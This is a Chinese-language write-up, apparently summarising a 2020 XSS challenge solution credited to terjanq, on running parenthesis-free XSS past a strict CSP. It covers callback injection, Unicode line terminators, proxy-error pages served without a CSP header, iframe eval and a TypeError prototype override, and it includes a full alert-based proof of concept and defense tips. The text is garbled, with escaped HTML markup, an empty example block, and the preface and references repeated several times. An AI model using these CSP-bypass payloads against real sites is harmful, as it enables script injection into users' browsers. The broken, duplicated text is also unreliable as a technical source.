无括号XSS任意代码执行技术研究<\/h1>

前言<\/h2>
无括号XSS向量近年来受到安全研究人员的广泛关注。本文详细探讨了在严格内容安全策略(CSP)限制下实现无括号XSS的技术细节，包括挑战设计、解决方案和替代方法。<\/p>

XSS挑战设计<\/h2>

挑战目标：在严格CSP策略下，仅使用有限字符集[a-zA-Z$_=.\u007f-\uffff]<\/code>执行任意XSS。<\/p>

CSP策略：<\/p>

default-src 'self';
script-src 'self';
<\/code><\/pre>
该策略阻止了：<\/p>

内联代码执行（如location=name<\/code>, <svg\/onload=alert()><\/code>）<\/li>
字符串评估器（如eval("alert()")<\/code>, Function("alert()")()<\/code>）<\/li>
<\/ul>
解决方案详解<\/h2>
1. 控制回调函数中的方法<\/h3>
通过URL参数注入回调函数：<\/p>
%26cb==alert
<\/code><\/pre>
2. 利用Unicode行终止符<\/h3>
使用U+2028和U+2029作为JavaScript行终止符：<\/p>
eval('x=123\u2028alert(x)'<\/span>)  \/\/ 将执行alert(123)
<\/span><\/span><\/span><\/code><\/pre>3. 将任意HTML注入页面<\/h3>
在不使用window.name<\/code>或location.href<\/code>的情况下，使用以下技术：<\/p>
document.body<\/span>.innerHTML<\/span> =<\/span> document.referrer<\/span>;
<\/span><\/span>document.body<\/span>.innerHTML<\/span> =<\/span> document.body<\/span>.innerText<\/span>;
<\/span><\/span><\/code><\/pre>示例注入：<\/p>

<\/span><\/span><\/code><\/pre>4. 绕过严格CSP的关键技术<\/h3>
反向代理利用<\/h4>
通过构造特殊请求使反向代理不转发请求，从而避免CSP头的设置：<\/p>

\/%2f<\/code> → "Not Found"<\/li>
\/%GG<\/code> → "Bad Request"（无法URL解码）<\/li>
<\/ul>
无CSP的iframe技术<\/h4>
document.body<\/span>.innerHTML<\/span> =<\/span> "<iframe name=x src=%GG>"<\/span>;
<\/span><\/span>x<\/span>.eval("alert(location.href)"<\/span>);
<\/span><\/span><\/code><\/pre>关键问题<\/strong>：<\/p>

注入的iframe初始状态为about:blank<\/code>，会继承父窗口的CSP<\/li>
需要等待iframe加载完成<\/li>
<\/ul>
实现iframe加载检测<\/h4>
document.body<\/span>.innerHTML<\/span> =<\/span> "<iframe id=i src=data:,1>"<\/span>;
<\/span><\/span>i<\/span>.onload<\/span> =<\/span> atob<\/span>;  \/\/ 会抛出调用错误
<\/span><\/span><\/span><\/code><\/pre>错误分析<\/strong>：<\/p>

Chrome错误：Uncaught TypeError:<\/code><\/li>
Firefox错误：TypeError:<\/code><\/li>
<\/ul>
利用错误原型覆盖<\/h4>
TypeError<\/span>.prototype<\/span>.name<\/span> =<\/span> "-alert(1337);var Uncaught\/\/"<\/span>;
<\/span><\/span><\/code><\/pre>该技巧使两个浏览器的错误消息都包含可执行代码。<\/p>
最终执行<\/h4>
将onerror<\/code>设置为iframe的eval<\/code>方法：<\/p>
onerror<\/span> =<\/span> i<\/span>.contentWindow<\/span>.eval
<\/span><\/span><\/code><\/pre>5. 完整PoC<\/h3>
\/\/ 控制回调
<\/span><\/span><\/span><\/span>%<\/span>26<\/span>cb<\/span>==<\/span>alert<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ HTML注入
<\/span><\/span><\/span><\/span>document.body<\/span>.innerHTML<\/span> =<\/span> "<iframe name=x src=%GG>"<\/span>;
<\/span><\/span>
<\/span><\/span>\/\/ 错误处理与执行
<\/span><\/span><\/span><\/span>x<\/span>.onload<\/span> =<\/span> function<\/span>() {
<\/span><\/span>  TypeError<\/span>.prototype<\/span>.name<\/span> =<\/span> "-alert(1337);var Uncaught\/\/"<\/span>;
<\/span><\/span>  throw<\/span> new<\/span> TypeError<\/span>;
<\/span><\/span>};
<\/span><\/span>x<\/span>.onerror<\/span> =<\/span> x<\/span>.contentWindow<\/span>.eval;
<\/span><\/span><\/code><\/pre>替代解决方案<\/h2>
使用setTimeout<\/code>替代eval<\/code>的技术：<\/p>
document.body<\/span>.innerHTML<\/span> =<\/span> "<iframe id=i src=data:,1>"<\/span>;
<\/span><\/span>i<\/span>.onload<\/span> =<\/span> setTimeout<\/span>;
<\/span><\/span><\/code><\/pre>关键发现<\/strong>：<\/p>

当iframe处于空白状态时，可以在窗口上定义其onload<\/code>事件<\/li>
仅在同源iframe中有效，违反同源策略(SOP)<\/li>
<\/ul>
技术要点总结<\/h2>

字符限制绕过<\/strong>：利用Unicode行终止符在有限字符集下构造有效JavaScript<\/li>
CSP绕过<\/strong>：通过反向代理错误避免CSP头设置<\/li>
DOM操作<\/strong>：使用innerHTML<\/code>和innerText<\/code>链实现HTML注入<\/li>
错误处理利用<\/strong>：覆盖错误原型构造可执行代码<\/li>
执行上下文<\/strong>：利用iframe的加载状态和继承特性<\/li>
<\/ol>
防御建议<\/h2>

对所有响应设置严格的CSP头<\/li>
正确处理URL编码和特殊字符<\/li>
限制回调函数的可控性<\/li>
监控和限制原型修改操作<\/li>
对反向代理配置进行严格测试，避免错误请求绕过<\/li>
<\/ol>
参考文献<\/h2>

原文作者：terjanq<\/li>
原文地址：[原始链接]<\/li>
研究时间：2020年8月<\/li>
<\/ul>
该技术展示了在极端限制条件下实现XSS的创造性方法，对现代Web应用安全防护提出了新的挑战。<\/p>

无括号XSS任意代码执行技术研究<\/h1>

前言<\/h2> 无括号XSS向量近年来受到安全研究人员的广泛关注。本文详细探讨了在严格内容安全策略(CSP)限制下实现无括号XSS的技术细节，包括挑战设计、解决方案和替代方法。<\/p>

解决方案详解<\/h2>

4. 绕过严格CSP的关键技术<\/h3>

参考文献<\/h2> 原文作者：terjanq<\/li> 原文地址：[原始链接]<\/li> 研究时间：2020年8月<\/li> <\/ul> 该技术展示了在极端限制条件下实现XSS的创造性方法，对现代Web应用安全防护提出了新的挑战。<\/p>

前言<\/h2>
无括号XSS向量近年来受到安全研究人员的广泛关注。本文详细探讨了在严格内容安全策略(CSP)限制下实现无括号XSS的技术细节，包括挑战设计、解决方案和替代方法。<\/p>

参考文献<\/h2>

原文作者：terjanq<\/li>
原文地址：[原始链接]<\/li>
研究时间：2020年8月<\/li> <\/ul>
该技术展示了在极端限制条件下实现XSS的创造性方法，对现代Web应用安全防护提出了新的挑战。<\/p>